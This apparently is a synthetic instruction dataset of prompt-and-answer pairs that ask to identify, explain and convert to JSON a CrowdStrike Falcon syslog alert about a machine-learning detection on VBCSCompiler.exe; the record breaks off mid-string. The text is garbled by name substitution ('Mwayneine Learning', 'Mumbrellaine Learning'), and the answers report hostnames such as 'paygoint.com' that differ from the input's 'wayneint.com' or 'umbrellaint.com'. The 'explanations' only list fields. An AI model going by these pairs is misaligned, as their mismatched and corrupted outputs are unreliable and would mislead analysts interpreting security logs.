WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASQATWEB01.devnvi.paygoint.com clientmac: 0accca51756b filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-25T11:20:20Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 91.202.71.43 userName: johndoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com", "clientmac": "0accca51756b", "filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mwayneine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mwayneine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-25T11:20:20Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "177.252.54.43", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASQATWEB01.devnvi.paygoint.com clientmac: 0accca51756b filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-25T11:20:20Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 177.252.54.43 userName: alice
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com", "clientmac": "0accca51756b", "filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mumbrellaine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mumbrellaine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"nighthawk\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET 